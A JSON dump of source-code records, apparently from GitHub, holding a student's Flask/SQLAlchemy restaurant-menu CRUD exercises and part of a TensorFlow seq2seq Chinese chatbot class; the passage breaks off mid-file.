[ { "alpha_fraction": 0.6733871102333069, "alphanum_fraction": 0.6908602118492126, "avg_line_length": 31.30434799194336, "blob_id": "7a41cb914038ae2e4e854064dbb007168c416285", "content_id": "f693e14ed9dde98dc39f08c16e8c28d651e6290a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 744, "license_type": "no_license", "max_line_length": 73, "num_lines": 23, "path": "/Lesson-3/MySitePractice/database_setup_flask_sql.py", "repo_name": "clayliau/Full-Stack-Foundations", "src_encoding": "UTF-8", "text": "from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///restaurantmenu2.db'\ndb = SQLAlchemy(app)\n\nclass Restaurant(db.Model):\n __tablename__ = 'restaurant'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), nullable=False)\n\n\nclass MenuItem(db.Model):\n __tablename__ = 'menu_item'\n\n name = db.Column(db.String(80), nullable=False)\n id = db.Column(db.Integer, primary_key=True)\n description = db.Column(db.String(250))\n price = db.Column(db.String(8))\n course = db.Column(db.String(250))\n restaurant_id = db.Column(db.Integer, db.ForeignKey('restaurant.id'))\n restaurant = db.relationship(Restaurant)\n\n" }, { "alpha_fraction": 0.6670293807983398, "alphanum_fraction": 0.6705114245414734, "avg_line_length": 35.46825408935547, "blob_id": "2f89ebf0dc5a16cfa15e73c0e414c4387b9b04f2", "content_id": "5a8a000701699c093e5bfd2c0423c08df128b176", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4595, "license_type": "no_license", "max_line_length": 118, "num_lines": 126, "path": "/Lesson-4/My-Final-Project/project.py", "repo_name": "clayliau/Full-Stack-Foundations", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, url_for, request, redirect, flash, jsonify\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Restaurant, Base, MenuItem\nfrom sqlalchemy.orm import scoped_session\n\n\nengine = create_engine('sqlite:///Lesson-3/MySitePractice/restaurantmenu.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = scoped_session(DBSession)\n\n\napp = Flask(__name__)\n\ndef query_one_restaurant(get_id):\n res_query = session.query(Restaurant).filter(Restaurant.id==get_id).first()\n session.remove()\n return res_query\ndef query_menuItem_by_one_res_id(get_id):\n menu_query = session.query(MenuItem).filter(MenuItem.restaurant_id==get_id)\n session.remove()\n return menu_query\ndef query_menuItem_by_one_menu_id(get_id):\n menuItem_query = session.query(MenuItem).filter(MenuItem.id==get_id).one()\n session.remove()\n return menuItem_query\n\ndef add_menuItem(name, restaurant_id, description=None, price=None, course=None):\n newItem = MenuItem(name=name,\\\n restaurant_id=restaurant_id,\\\n description=description,\\\n price=price,\\\n course=course)\n session.add(newItem)\n try:\n session.commit()\n session.remove()\n return True\n except:\n session.remove()\n return False\n\ndef edit_menuItem(edit_item):\n session.add(edit_item)\n try:\n session.commit()\n session.remove()\n return True\n except:\n session.remove()\n return False\n \ndef delete_menuItem(delete_item):\n session.delete(delete_item)\n try:\n session.commit()\n session.remove()\n return True\n except:\n session.remove()\n return False\n\n\n@app.route('/')\n@app.route('/restaurants/<int:restaurant_id>/')\ndef restaurantMenu(restaurant_id):\n restaurant_query = query_one_restaurant(restaurant_id)\n res_menu = query_menuItem_by_one_res_id(restaurant_query.id)\n return render_template('menu.html', restaurant=restaurant_query, items=res_menu)\n\n# Task 1: Create route for newMenuItem function here\n@app.route('/restaurants/<int:restaurant_id>/new/', methods = ['GET','POST'])\ndef newMenuItem(restaurant_id):\n if request.method == 'POST':\n print('Post Method')\n add_menuItem(request.form['name'], restaurant_id)\n flash('new menu item is created')\n return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))\n else:\n return render_template('newmenuitem.html', restaurant_id = restaurant_id)\n #return \"page to create a new menu item. Task 1 complete!\"\n\n# Task 2: Create route for editMenuItem function here\n@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/edit/', methods = ['GET','POST'])\ndef editMenuItem(restaurant_id, menu_id):\n res_menu = query_menuItem_by_one_menu_id(menu_id)\n if request.method == 'POST':\n print('Post Method')\n if request.form['name']:\n res_menu.name = request.form['name']\n edit_menuItem(res_menu)\n flash('item\\'s name is updated')\n return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))\n else:\n return render_template('editmenuitem.html', restaurant_id = restaurant_id, menu_id = menu_id, menu = res_menu)\n #return \"edit page\"\n\n# Task 3: Create a route for deleteMenuItem function here\n@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/delete/', methods = ['GET','POST'])\ndef deleteMenuItem(restaurant_id, menu_id):\n res_menu = query_menuItem_by_one_menu_id(menu_id)\n if request.method == 'POST':\n delete_menuItem(res_menu)\n flash('item\\'s is deleted')\n return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))\n else:\n return render_template('deletemenuitem.html', item = res_menu)\n return \"page to delete a menu item. Task 3 complete!\"\n\n@app.route('/restaurants/<int:restaurant_id>/menu/JSON')\ndef restaurantMenuJSON(restaurant_id):\n restaurant_query = query_one_restaurant(restaurant_id)\n res_menu = query_menuItem_by_one_res_id(restaurant_query.id)\n return jsonify(MenuItems=[i.serialize for i in res_menu])\n\n@app.route('/restaurants/<int:restaurant_id>/menu/<int:menu_id>/JSON')\ndef menuJSON(restaurant_id, menu_id):\n res_menu = query_menuItem_by_one_menu_id(menu_id)\n return jsonify(MenuItems=res_menu.serialize)\n\nif __name__ == '__main__':\n app.secret_key = 'super_secret_key'\n app.debug = True\n app.run(host='127.0.0.1', port=5000)\n" }, { "alpha_fraction": 0.6744186282157898, "alphanum_fraction": 0.6761950850486755, "avg_line_length": 37.70624923706055, "blob_id": "021bf4a8bbd26aef3afcce12f4802fe59139460a", "content_id": "615e9609b0c399524f20ea2eb7bf132a9e7810ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6192, "license_type": "no_license", "max_line_length": 104, "num_lines": 160, "path": "/Lesson-4/My-Final-Project/finalproject.py", "repo_name": "clayliau/Full-Stack-Foundations", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, url_for, request, redirect, flash, jsonify\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Restaurant, Base, MenuItem\nfrom sqlalchemy.orm import scoped_session\n\nOK = True\nNoOK = False\n\nengine = create_engine('sqlite:///Lesson-3/MySitePractice/restaurantmenu.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = scoped_session(DBSession)\n\napp = Flask(__name__)\n\ndef queryAllfromDB(tableObj):\n res_query = session.query(tableObj).all()\n session.remove()\n return res_query\n\ndef addEditItemtoDB(itemObj):\n try:\n session.add(itemObj)\n session.commit()\n session.remove()\n return OK\n except:\n return NoOK\n\ndef queryOnefromDB(tableObj, target_id):\n res_query = session.query(tableObj).filter(tableObj.id==target_id).one()\n session.remove()\n return res_query\n \ndef deleteOnefromDB(itemObj):\n try:\n session.delete(itemObj)\n session.commit()\n session.remove()\n return OK\n except:\n return NoOK\n\ndef queryRestaurantMenufromDB(target_id):\n res_query = session.query(MenuItem).filter(MenuItem.restaurant_id==target_id)\n session.remove()\n return res_query\n\n\n@app.route('/')\n@app.route('/restaurants')\ndef showRestaurants():\n restaurants = queryAllfromDB(Restaurant)\n return render_template('restaurants.html', restaurants = restaurants)\n\n@app.route('/restaurants/JSON')\ndef showRestaurantsJSON():\n restaurants = queryAllfromDB(Restaurant)\n return jsonify(Restaurants = [i.serialize for i in restaurants])\n\n@app.route('/restaurant/new', methods=['POST', 'GET'])\ndef newRestaurant():\n if request.method == 'POST':\n name_from_form = request.form['name']\n newRes = Restaurant(name=name_from_form)\n addEditItemtoDB(newRes)\n flash('New restaurant %s item is added in database' %name_from_form)\n return redirect(url_for('showRestaurants'))\n else:\n return render_template('newRestaurant.html')\n\n@app.route('/restaurant/<int:restaurant_id>/edit', methods=['POST', 'GET'])\ndef editRestaurant(restaurant_id):\n restaurant_query = queryOnefromDB(Restaurant, restaurant_id)\n if request.method == 'POST':\n old_name = restaurant_query.name\n new_name = request.form['name']\n restaurant_query.name = new_name\n addEditItemtoDB(restaurant_query)\n flash('%s\\'s name is changed to %s' %(old_name, new_name))\n return redirect(url_for('showRestaurants'))\n else:\n return render_template('editRestaurant.html', restaurant=restaurant_query)\n\n@app.route('/restaurant/<int:restaurant_id>/delete', methods=['POST', 'GET'])\ndef deleteRestaurant(restaurant_id):\n restaurant_query = queryOnefromDB(Restaurant, restaurant_id)\n if request.method == 'POST':\n DeleteOK = deleteOnefromDB(restaurant_query)\n if DeleteOK:\n flash('%s is deleted from database' %(restaurant_query.name))\n else:\n flash('Error occurs when deleting %s' %(restaurant_query.name))\n return redirect(url_for('showRestaurants'))\n else:\n return render_template('deleteRestaurant.html', restaurant=restaurant_query)\n\n@app.route('/restaurant/<int:restaurant_id>')\n@app.route('/restaurant/<int:restaurant_id>/menu')\ndef showMenu(restaurant_id):\n menu_item = queryRestaurantMenufromDB(restaurant_id)\n restaurant = queryOnefromDB(Restaurant, restaurant_id)\n return render_template('menu.html', restaurant = restaurant, items = menu_item)\n\n@app.route('/restaurant/<int:restaurant_id>/JSON')\n@app.route('/restaurant/<int:restaurant_id>/menu/JSON')\ndef showMenuJSON(restaurant_id):\n menu_item = queryRestaurantMenufromDB(restaurant_id)\n return jsonify(MenuItems = [i.serialize for i in menu_item])\n\n@app.route('/restaurant/<int:restaurant_id>/menu/<int:menu_id>/JSON')\ndef showMenuItemJSON(restaurant_id, menu_id):\n target_item = queryOnefromDB(MenuItem, menu_id)\n return jsonify(MenuItem = target_item.serialize)\n\n@app.route('/restaurant/<int:restaurant_id>/menu/new', methods=['POST', 'GET'])\ndef newMenuItem(restaurant_id):\n if request.method == 'POST':\n newItem = MenuItem(name = request.form['name'],\\\n description = request.form['description'],\\\n price = request.form['price'],\\\n course = request.form['course'],\n restaurant_id = restaurant_id)\n addEditItemtoDB(newItem)\n flash('New menu item %s is added in database' %request.form['name'])\n return redirect(url_for('showMenu', restaurant_id = restaurant_id))\n else:\n return render_template('newmenuitem.html') \n\n@app.route('/restaurant/<int:restaurant_id>/menu/<int:menu_id>/edit', methods = ['POST', 'GET'])\ndef editMenuItem(restaurant_id, menu_id):\n target_item = queryOnefromDB(MenuItem, menu_id)\n if request.method == 'POST':\n old_name = target_item.name\n target_item.name = request.form['name']\n target_item.description = request.form['description']\n target_item.price = request.form['price']\n target_item.course = request.form['course']\n addEditItemtoDB(target_item)\n flash('Menu item %s is modified in database' %old_name)\n return redirect(url_for('showMenu', restaurant_id = restaurant_id))\n else:\n return render_template('editmenuitem.html', item = target_item, restaurant_id= restaurant_id)\n\n@app.route('/restaurant/<int:restaurant_id>/menu/<int:menu_id>/delete', methods = ['POST', 'GET'])\ndef deleteMenuItem(restaurant_id, menu_id):\n target_item = queryOnefromDB(MenuItem, menu_id)\n if request.method == 'POST':\n deleteOnefromDB(target_item)\n flash('Menu item %s is deleted in database' %target_item.name)\n return redirect(url_for('showMenu', restaurant_id = restaurant_id))\n else:\n return render_template('deletemenuitem.html', item = target_item, restaurant_id= restaurant_id)\n\n\nif __name__=='__main__':\n app.secret_key = 'super_secret_key'\n app.debug = True\n app.run(host='127.0.0.1', port=5000)" }, { "alpha_fraction": 0.7089460492134094, "alphanum_fraction": 0.7156862616539001, "avg_line_length": 33.74468231201172, "blob_id": "5f3d0ba1c6ce105899505cd357afbad6b52ac352", "content_id": "9fcbdd49afc595ee89e9a32b001ad72768c22823", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1632, "license_type": "no_license", "max_line_length": 92, "num_lines": 47, "path": "/Lesson-3/MySitePractice/finalproject.py", "repo_name": "clayliau/Full-Stack-Foundations", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, url_for, request, redirect, flash, jsonify\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///Lesson-4/Final-Project/restaurantmenu.db'\ndb = SQLAlchemy(app)\n\n\n@app.route('/')\n@app.route('/restaurants')\ndef showRestaurants():\n\n return 'This page will show all my restaurants'\n\n@app.route('/restaurant/new')\ndef newRestaurants():\n return \"This page will be for making new restaurant\"\n\n@app.route('/restaurant/<int:restaurant_id>/edit')\ndef editRestaurants(restaurant_id):\n return \"This page will be for editing restaurant %s\" % restaurant_id\n\n@app.route('/restaurant/<int:restaurant_id>/delete')\ndef deleteRestaurants(restaurant_id):\n return \"This page will be for deleting restaurant %s\" % restaurant_id\n\n@app.route('/restaurant/<int:restaurant_id>')\n@app.route('/restaurant/<int:restaurant_id>/menu')\ndef showMenu(restaurant_id):\n return \"This page is the menu for restaurant %s\" % restaurant_id\n\n@app.route('/restaurant/<int:restaurant_id>/menu/new')\ndef newMenuItem(restaurant_id):\n return \"This page is for adding new menu item for restaurant %s\" % restaurant_id\n\n@app.route('/restaurant/<int:restaurant_id>/menu/<int:menu_id>/edit')\ndef editMenuItem(restaurant_id, menu_id):\n return \"This page is for editing menu item %s\" % menu_id\n\n@app.route('/restaurant/<int:restaurant_id>/menu/<int:menu_id>/delete')\ndef deleteMenuItem(restaurant_id, menu_id):\n return \"This page is for deleting menu item %s\" % menu_id\n\nif __name__=='__main__':\n app.secret_key = 'super_secret_key'\n app.debug = True\n app.run(host='127.0.0.1', port=5000)" } ]
4
Yang-shihong/Chat
https://github.com/Yang-shihong/Chat
31729918c6b18d35d364aa486325631db63d7742
3f1803b9863adcdc2b8ee9b10d9845884e3aba07
28db6ab0b215add0236dbc938c6e16f0d03d5108
refs/heads/master
2020-05-15T10:13:42.066239
2018-10-09T06:59:21
2018-10-09T06:59:21
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6787319779396057, "alphanum_fraction": 0.6852377653121948, "avg_line_length": 36.659244537353516, "blob_id": "0969514d42df525050c46351f83a1394203326e0", "content_id": "ed038d61f40a2d1bc1fb0651c61b52ff446bf3ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18088, "license_type": "no_license", "max_line_length": 183, "num_lines": 449, "path": "/ChatBot/ChatBot.py", "repo_name": "Yang-shihong/Chat", "src_encoding": "UTF-8", "text": "#! /usr/bin/python3\n\nimport tensorflow as tf\nimport jieba\nimport numpy as np\nimport pickle\nimport sys\nimport os\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\nclass ChatBot():\n\t\n\tdef __init__(self, enc_embed_dim = 20, dec_embed_dim = 20\n\t\t\t\t,epoches = 10, batch_size = 10, learning_rate = 0.01\n\t\t\t\t,n_enc_hidden = [20,20], n_dec_hidden = [20,20]):\n\t\t'''\n\t\t初始化方法\n\t\tArgs:\n\t\t\tenc_embed_dim: Encoder端Embedding维度\n\t\t\tdec_embed_dim: Decoder端Embedding维度\n\t\t\tepoches: 迭代次数\n\t\t\tbatch_size: 每批次序列个数\n\t\t\tlearning_rate: 学习速率\n\t\t\tn_enc_hidden: Encoder端各隐藏层中的节点数 [N1, N2, ...]\n\t\t\tn_dec_hidden: Decoder端各隐藏层中的节点数 [M1, M2, ...]\n\t\t'''\n\t\tself._enc_embed_dim = enc_embed_dim\n\t\tself._dec_embed_dim = dec_embed_dim\n\t\tself._epoches = epoches\n\t\tself._batch_size = batch_size\n\t\tself._learning_rate = learning_rate\n\t\tself._n_enc_hidden = n_enc_hidden\n\t\tself._n_dec_hidden = n_dec_hidden\n\t\n\t\tself._source_vocab_size = 0\n\t\tself._target_vocab_size = 0\n\t\tself._source_id_word_map = None\n\t\tself._target_id_word_map = None\n\t\tself._source_word_id_map = None\n\t\tself._target_word_id_map = None\n\t\n\tdef get_id_word_map(self):\n\t\t'''\n\t\t获取映射表\n\t\t'''\n\t\treturn self._source_id_word_map, self._target_id_word_map, self._source_word_id_map, self._target_word_id_map\n\t\t\n\tdef set_id_word_map(self, source_id_word_map, target_id_word_map, source_word_id_map, target_word_id_map):\n\t\t'''\n\t\t设置映射表\n\t\t'''\n\t\tself._source_id_word_map = source_id_word_map\n\t\tself._target_id_word_map = target_id_word_map\n\t\tself._source_word_id_map = source_word_id_map\n\t\tself._target_word_id_map = target_word_id_map\n\t\t\n\t\tself._source_vocab_size = len(source_id_word_map) #Encoder层输入样本字典大小\n\t\tself._target_vocab_size = len(target_id_word_map) #Decoder层输入样本字典大小\n\t\n\tdef build_input_struct(self):\n\t\t'''\n\t\t构建模型输入样本结构\n\t\tArgs:\n\t\t\tencoder_input: Encoder层Mini-batch输入\n\t\t\tdecoder_input: Decoder层Mini-batch输入\n\t\t\tencoder_input_seq_len: Encoder层Mini-batch输入样本每个序列的长度\n\t\t\tdecoder_input_seq_len: Decoder层Mini-batch输入样本每个序列的长度\n\t\t\tdecoder_max_input_seq_len: Decoder层输入样本每批次序列最大长度\n\t\t'''\n\t\tencoder_input = tf.placeholder(dtype=tf.int32, shape=[None,None], name=\"encoder_input\")\n\t\tdecoder_input = tf.placeholder(dtype=tf.int32, shape=[None,None], name=\"decoder_input\")\n\t\tencoder_input_seq_len = tf.placeholder(dtype=tf.int32, shape=(None,), name=\"encoder_input_seq_len\")\n\t\tdecoder_input_seq_len = tf.placeholder(dtype=tf.int32, shape=(None,), name=\"decoder_input_seq_len\")\n\t\tdecoder_max_input_seq_len = tf.reduce_max(decoder_input_seq_len, name=\"decoder_max_input_seq_len\")\n\t\treturn encoder_input, decoder_input, encoder_input_seq_len, decoder_input_seq_len, decoder_max_input_seq_len\n\t\n\tdef read_data_sets(self, path):\n\t\t'''\n\t\t读取输入文件及对应目标输出数据文件\n\t\tArgs:\n\t\t\tpath: Q&A文件路径\n\t\tReturns:\n\t\t\tsource_ids: 对输入的索引Ids\n\t\t\ttarget_ids: 对对应目标输出的索引Ids\n\t\t'''\n\t\tsource_sentences = []\n\t\ttarget_sentences = []\n\t\tsource_words = []\n\t\ttarget_words = []\n\t\t# 分词处理\n\t\tis_question = True\n\t\twith open(path, 'r', encoding='utf-8') as f:\n\t\t\tfor line in f:\n\t\t\t\tif line[0] == 'M':\n\t\t\t\t\tline = line[2:] # 去掉'M '\n\t\t\t\t\tif line[-1] == '\\n':\n\t\t\t\t\t\tline = line[:-1]\n\t\t\t\t\tword_gen = jieba.cut(line)\n\t\t\t\t\tif is_question:\n\t\t\t\t\t\tsource_sentences.append(list(word_gen))\n\t\t\t\t\t\tis_question = False\n\t\t\t\t\telse:\n\t\t\t\t\t\ttarget_sentences.append(list(word_gen))\n\t\t\t\t\t\tis_question = True\n\t\t\t\t\t\n\t\tsource_words = [word for sentence in source_sentences for word in sentence]\n\t\ttarget_words = [word for sentence in target_sentences for word in sentence]\n\t\t\n\t\t# 去重\n\t\tsource_words_unique = list(set(source_words))\n\t\ttarget_words_unique = list(set(target_words))\n\t\t\n\t\t# 添加特殊标志\n\t\tspecial_words = ['<GO>', '<EOS>', '<UNK>', '<PAD>']\n\t\t\n\t\t# id-word映射\n\t\tsource_id_word_map = {id:word for id, word in enumerate(source_words_unique+special_words)}\n\t\ttarget_id_word_map = {id:word for id, word in enumerate(target_words_unique+special_words)}\n\t\tself._source_vocab_size = len(source_id_word_map) #Encoder层输入样本字典大小\n\t\tself._target_vocab_size = len(target_id_word_map) #Decoder层输入样本字典大小\n\t\tself._source_id_word_map = source_id_word_map\n\t\tself._target_id_word_map = target_id_word_map\n\t\t\n\t\t# word-id映射\n\t\tsource_word_id_map = {word:id for id, word in enumerate(source_words_unique+special_words)}\n\t\ttarget_word_id_map = {word:id for id, word in enumerate(target_words_unique+special_words)}\n\t\tself._source_word_id_map = source_word_id_map\n\t\tself._target_word_id_map = target_word_id_map\n\t\t\n\t\tsource_sentences = source_sentences[:256]\n\t\ttarget_sentences = target_sentences[:256]\n\t\t# 对输入文本进行索引\n\t\tsource_ids = [[source_word_id_map[word] for word in sentence] for sentence in source_sentences]\n\t\ttarget_ids = [[target_word_id_map[word] for word in sentence] + [target_word_id_map['<EOS>']] for sentence in target_sentences]\n\t\t\n\t\tprint('source vocab size: {}'.format(self._source_vocab_size))\n\t\tprint('target vocab size: {}'.format(self._target_vocab_size))\n\t\t\n\t\t# 保存字典\n\t\tpickle.dump(source_word_id_map, open('./source_word_id_map.bin','wb'))\n\t\tpickle.dump(target_word_id_map, open('./target_word_id_map.bin','wb'))\n\t\tpickle.dump(source_id_word_map, open('./source_id_word_map.bin','wb'))\n\t\tpickle.dump(target_id_word_map, open('./target_id_word_map.bin','wb'))\n\t\t\n\t\treturn source_ids, target_ids\n\t\t\n\tdef word_embedding(self, ids, vocab_size, embed_dim):\n\t\t'''\n\t\tWord Embedding\n\t\tArgs:\n\t\t\tids: 待Embedding的输入\n\t\tReturns:\n\t\t\tEmbedding的序列\n\t\t'''\n\t\treturn tf.contrib.layers.embed_sequence(ids, vocab_size, embed_dim)\n\t\t\n\tdef build_encoder_layer(self):\n\t\t'''\n\t\t构建Encoder层\n\t\tReturn:\n\t\t\tencoder_model: Encoder模型\n\t\t'''\n\t\tdef build_lstm_cell(rnn_size):\n\t\t\t'''\n\t\t\t构建LSTM单元\n\t\t\t'''\n\t\t\tinit = tf.random_uniform_initializer(-1, 0.2, seed = 100, dtype = tf.float32)\n\t\t\treturn tf.contrib.rnn.LSTMCell(rnn_size, initializer = init)\n\t\tencoder_model = tf.contrib.rnn.MultiRNNCell([build_lstm_cell(rnn_size) for rnn_size in self._n_enc_hidden])\t\n\t\treturn encoder_model\n\t\t\n\tdef obtain_encoder_result(self, encoder_model, embed_input):\n\t\t'''\n\t\t输入embedding Mini-batch样本\n\t\t获取Encoder模型结果\n\t\tArgs:\n\t\t\tencoder_model: Encoder模型\n\t\t\tembed_input: embedding Mini-batch样本 [batch_size, seq_len, embed_dim]\n\t\tReturn:\n\t\t\toutputs: Encoder模型RNN单元的输出 [batch_size, seq_len, rnn_size]\n\t\t\tlast_states: Encoder模型RNN单元最后状态的输出, 一般为元组(c, h) [batch_size, rnn_size]\n\t\t'''\n\t\toutputs, last_states = tf.nn.dynamic_rnn(encoder_model, embed_input, sequence_length = self._encoder_input_seq_len, dtype=tf.float32)\n\t\treturn outputs, last_states\n\t\n\tdef obtain_decoder_input(self):\n\t\t'''\n\t\t获取Decoder模型的输入样本\n\t\tReturn:\n\t\t\tdecoder_input: 预处理后的Decoder输入\n\t\t'''\n\t\t#删除<EOS>标志,并添加<GO>作为Decoder输入\n\t\t#slice_input = tf.slice(self._decoder_input, [0,0], [self._batch_size, -1])\n\t\tslice_input = self._decoder_input[:,:-1]\n\t\tdecoder_input = tf.concat([tf.fill([self._batch_size,1], self._target_word_id_map['<GO>']), slice_input], 1)\n\t\treturn decoder_input\n\t\n\tdef build_decoder_layer(self):\n\t\t'''\n\t\t构建Decoder模型\n\t\tReturn:\n\t\t\tdecoder_model: Decoder模型\n\t\t'''\n\t\tdef build_lstm_cell(rnn_size):\n\t\t\t'''\n\t\t\t构建LSTM单元\n\t\t\t'''\n\t\t\tinit = tf.random_uniform_initializer(-1, 0.2, seed = 100, dtype = tf.float32)\n\t\t\treturn tf.contrib.rnn.LSTMCell(rnn_size, initializer = init)\n\t\tdecoder_model = tf.contrib.rnn.MultiRNNCell([build_lstm_cell(rnn_size) for rnn_size in self._n_dec_hidden])\n\t\treturn decoder_model\n\t\t\n\tdef obtain_decoder_result(self, encoder_state, decoder_model, decoder_input):\n\t\t'''\n\t\t得到Decoder模型的输出\n\t\tArgs:\n\t\t\tencoder_state: Encoder层状态输出\n\t\t\tdecoder_model: 构建的Decoder模型\n\t\t\tdecoder_input: Decoder层Mini-batch输入\n\t\tReturn:\n\t\t\tDecoder层训练及预测结果\n\t\t'''\n\t\tdecoder_embedding = tf.Variable(tf.random_uniform([self._target_vocab_size, self._dec_embed_dim]))\n\t\tembedding_decoder_input = tf.nn.embedding_lookup(decoder_embedding, decoder_input)\n\t\t\n\t\t# Decoder端输出全连接层\n\t\toutput_layer = tf.layers.Dense(self._target_vocab_size, kernel_initializer = tf.truncated_normal_initializer(mean=0.0, stddev=0.1))\n\t\t\n\t\twith tf.variable_scope('decode'):\n\t\t\t# only read inputs\n\t\t\ttrain_helper = tf.contrib.seq2seq.TrainingHelper(inputs = embedding_decoder_input, sequence_length = self._decoder_input_seq_len, time_major=False)\n\t\t\ttrain_decoder = tf.contrib.seq2seq.BasicDecoder(decoder_model, train_helper, encoder_state, output_layer)\n\t\t\ttrain_decoder_output, _, _ = tf.contrib.seq2seq.dynamic_decode(train_decoder, impute_finished=True, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tmaximum_iterations=self._decoder_max_input_seq_len)\n\t\twith tf.variable_scope('decode', reuse = True):\n\t\t\tstart_tokens = tf.tile(tf.constant([self._target_word_id_map['<GO>']], dtype=tf.int32), [self._batch_size])\n\t\t\tinfer_helper = tf.contrib.seq2seq.GreedyEmbeddingHelper(embedding = decoder_embedding, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tstart_tokens = start_tokens,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tend_token = self._target_word_id_map['<EOS>'])\n\t\t\tinfer_decoder = tf.contrib.seq2seq.BasicDecoder(decoder_model, infer_helper, encoder_state, output_layer)\n\t\t\tinfer_decoder_output, _, _ = tf.contrib.seq2seq.dynamic_decode(infer_decoder, impute_finished=True, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\tmaximum_iterations=self._decoder_max_input_seq_len)\n\t\treturn train_decoder_output, infer_decoder_output\n\t\n\t\n\tdef build_seq2seq_model(self):\n\t\t'''\n\t\t连接Encoder及Decoder形成Seq2Seq模型\n\t\tReturns:\n\t\t\ttrain_decoder_output: Decoder训练结果\n\t\t\tinfer_decoder_output: Decoder预测结果\t\n\t\t'''\n\t\t# 得到Encoder层Embedding后的Mini-batch输入\n\t\tencoder_embed_input = self.word_embedding(self._encoder_input, self._source_vocab_size, self._enc_embed_dim)\n\t\t# 构建Encoder模型\n\t\tencoder_model = self.build_encoder_layer()\n\t\t# 获取Encoder状态变量\n\t\t_, encoder_state = self.obtain_encoder_result(encoder_model, encoder_embed_input)\n\t\t# 获取Decoder输入\n\t\tdecoder_input = self.obtain_decoder_input()\n\t\t# 构建Decoder模型\n\t\tdecoder_model = self.build_decoder_layer()\n\t\t# 得到Decoder输出\n\t\ttrain_decoder_output, infer_decoder_output = self.obtain_decoder_result(encoder_state, decoder_model, decoder_input)\n\t\treturn train_decoder_output, infer_decoder_output\n\t\n\tdef pad_input(self, input, pad_int):\n\t\t'''\n\t\t补全输入样本\n\t\t使得每批次中各个序列的长度相等\n\t\tArgs:\n\t\t\tinput: Mini-batch样本\n\t\t\tpad_int: 补全符(整型)\n\t\tReturn:\n\t\t\tpadding_input: 补全之后的样本\n\t\t'''\n\t\tmax_len = max([len(item) for item in input])\n\t\tpadding_input = np.array([item + [pad_int]*(max_len-len(item)) for item in input])\n\t\treturn padding_input\n\t\n\t\n\tdef obtain_mini_batch(self, source_vocab_idx, target_vocab_idx):\n\t\t'''\n\t\t获取Mini-batch输入样本\n\t\tArgs:\n\t\t\tsource_vocab_idx: 输入样本索引列表\n\t\t\ttarget_vocab_idx: 理论输出索引列表\n\t\tReturn:\n\t\t\tpad_source_input_batch: 生成的输入Mini-batch(通过<PAD>进行了对齐)\n\t\t\tpad_target_input_batch: 对应的理论输出Mini-batch(通过<PAD>进行了对齐)\n\t\t\tsource_seq_len: 输入Mini-batch中每个序列的长度\n\t\t\ttarget_seq_len: 理论输出Mini-batch中每个序列的长度\n\t\t'''\n\t\tbatches = len(source_vocab_idx) // self._batch_size\n\t\tfor bat in range(batches):\n\t\t\tstart = bat*self._batch_size\n\t\t\tsource_input_batch = source_vocab_idx[start:start+self._batch_size]\n\t\t\ttarget_input_batch = target_vocab_idx[start:start+self._batch_size]\n\t\t\n\t\t\tpad_source_input_batch = self.pad_input(source_input_batch, self._source_word_id_map['<PAD>'])\n\t\t\tpad_target_input_batch = self.pad_input(target_input_batch, self._target_word_id_map['<PAD>'])\n\t\t\t\n\t\t\tsource_seq_len = []\n\t\t\ttarget_seq_len = []\t\n\t\t\tfor source in source_input_batch:\n\t\t\t\tsource_seq_len.append(len(source))\n\t\t\tfor target in target_input_batch:\n\t\t\t\ttarget_seq_len.append(len(target))\n\t\t\t\t\n\t\t\tyield pad_source_input_batch, pad_target_input_batch, source_seq_len, target_seq_len\n\t\t\t\n\tdef build_train_graph(self):\n\t\t'''\n\t\t构建训练图模型\n\t\tReturns:\n\t\t\ttrain_graph: 训练图\n\t\t\ttrain_op: 训练动作\n\t\t\tloss: 训练损失\n\t\t'''\n\t\ttrain_graph = tf.Graph()\n\t\twith train_graph.as_default():\n\t\t\tself._encoder_input, self._decoder_input \\\n\t\t\t,self._encoder_input_seq_len, self._decoder_input_seq_len, self._decoder_max_input_seq_len = self.build_input_struct()\n\t\t\ttrain_decoder_output, infer_decoder_output = self.build_seq2seq_model()\n\t\t\ttraining_logits = tf.identity(train_decoder_output.rnn_output, 'logits')\n\t\t\tinfer_logits = tf.identity(infer_decoder_output.sample_id, 'infer')\n\t\t\tmasks = tf.sequence_mask(self._decoder_input_seq_len, self._decoder_max_input_seq_len, dtype=tf.float32, name='masks')\n\t\t\twith tf.name_scope('optimization'):\n\t\t\t\tloss = tf.contrib.seq2seq.sequence_loss(training_logits, self._decoder_input, masks)\n\t\t\t\toptimizer = tf.train.AdamOptimizer(self._learning_rate)\n\t\t\t\tgradients = optimizer.compute_gradients(loss)\n\t\t\t\tcapped_gradients = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in gradients if grad is not None]\n\t\t\t\ttrain_op = 